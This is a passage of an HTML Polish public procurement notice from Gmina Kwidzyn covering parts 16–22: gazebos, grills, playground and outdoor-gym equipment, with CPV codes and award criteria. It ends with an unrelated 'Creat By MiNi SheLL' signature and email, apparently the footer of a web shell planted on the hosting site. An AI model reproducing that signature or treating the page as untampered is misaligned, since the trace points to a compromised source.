b)	wyposażenie altany w ławostoły,
c)	utwardzenie drewniane o powierzchni zabudowy ok. 77 m2 oraz utwardzenie kostką brukową o powierzchni zabudowy ok. 20 m2 w obrębie grilla,
d)	budowa pomostu drewnianego,
e)	dostawę i montaż huśtawki podwójnej,
f)	dostawę i montaż grilla prefabrykowanego,
g)	wykonanie nasadzeń materiału roślinnego i oczyszczenie stawu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.11.27.23-9, 37.53.52.00-9, 45.24.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Sołectwo Ośno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Ośno, na działce geodezyjnej nr 66/1, obręb Brokowo Rakowieckie, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 35 m2,
b)	wyposażenie altany w ławostoły,
c)	utwardzenie terenu pod altaną kostką brukową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Sołectwo Pastwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Pastwa, na działce geodezyjnej nr 160, obręb Pastwa, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 35 m2,
b)	wyposażenie altany w ławostoły,
c)	dostawa płytek chodnikowych oraz obrzeży do utwardzenia terenu pod altaną.

Do ceny ofertowej nie należy wliczać kosztów wykonywania robót ziemnych, w tym usunięcie humusu, a także budowy utwardzenia pod altaną tj. wykonania robót brukarskich oraz zakupu kruszywa i podsypki cem.-piaskowej. Roboty te zostaną wykonane przez Zamawiającego we własnym zakresie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Sołectwo Pawlice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Pawlice, na działce geodezyjnej nr 605/1, obręb Rakowiec, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 25 m2,
b)	wyposażenie altany w ławostoły,
c)	dostawę i montaż grilla prefabrykowanego,
d)	dostawę i montaż tablicy do gry w koszykówkę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.11.27.20-8, 45.26.23.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Sołectwo Podzamcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Podzamcze, na działce geodezyjnej nr 104, obręb Podzamcze, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 25 m2,
b)	wyposażenie altany w ławostoły,
c)	utwardzenie terenu pod altaną kostką brukową,
d)	dostawę i montaż grilla prefabrykowanego
e)	dostawa materiału roślinnego.

Do ceny ofertowej nie należy wliczać kosztów wykonywania nasadzeń materiału roślinnego. Roboty te zostaną wykonane przez Zamawiającego we własnym zakresie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5, 45.23.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> sołectwo Rozpędziny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Rozpędziny, na działce geodezyjnej nr 166, obręb Podzamcze, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	budowę drewnianej altany rekreacyjnej o powierzchni zabudowy ok. 35 m2,
b)	wyposażenie altany w ławostoły,
c)	dostawę i montaż grilla prefabrykowanego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.42.20.00-1, 45.26.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Sołectwo Szałwinek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Sołectwo Szałwinek, na działce geodezyjnej nr 324/14, obręb Janowo, gmina Kwidzyn.
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	dostawę i montaż urządzenia placu zabaw - zjazdu linowego,
b)	dostawę i montaż urządzenia placu zabaw - sześciokąta wielofunkcyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.32.00-1, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Brachlewo, Brokowo, Janowo, Nowy Dwór, Pawlice, Szałwinek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zagospodarowanie przestrzeni publicznej dla celów rekreacyjno-sportowych realizowane przez Gminę Kwidzyn:  na działce geodezyjnej nr 89/15 w Brachlewie, na działce geodezyjnej nr 605/15 w Pawlicach, na działce geodezyjnej nr 51/13 w Nowym Dworze, na działce geodezyjnej nr 73 w Brokowie,  na działce geodezyjnej nr 118/1 w Janowie, na działce geodezyjnej nr 324/10 w Szałwinku, 
Zakres zamówienia obejmuje w szczególności następujące elementy: 
a)	dostawa i montaż 3 podwójnych urządzeń siłowni zewnętrznej typu wyciąg górny i prasa nożna, 
b)	dostawa i montaż 4 podwójnych urządzeń siłowni zewnętrznej typu orbitrek i biegacz, 
c)	dostawa i montaż zjazdu linowego, 
d)	dostawa i montaż huśtawki podwójnej z koszem i siedziskiem płaskim, 
e)	dostawa i montaż 2 zestawów zabawowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com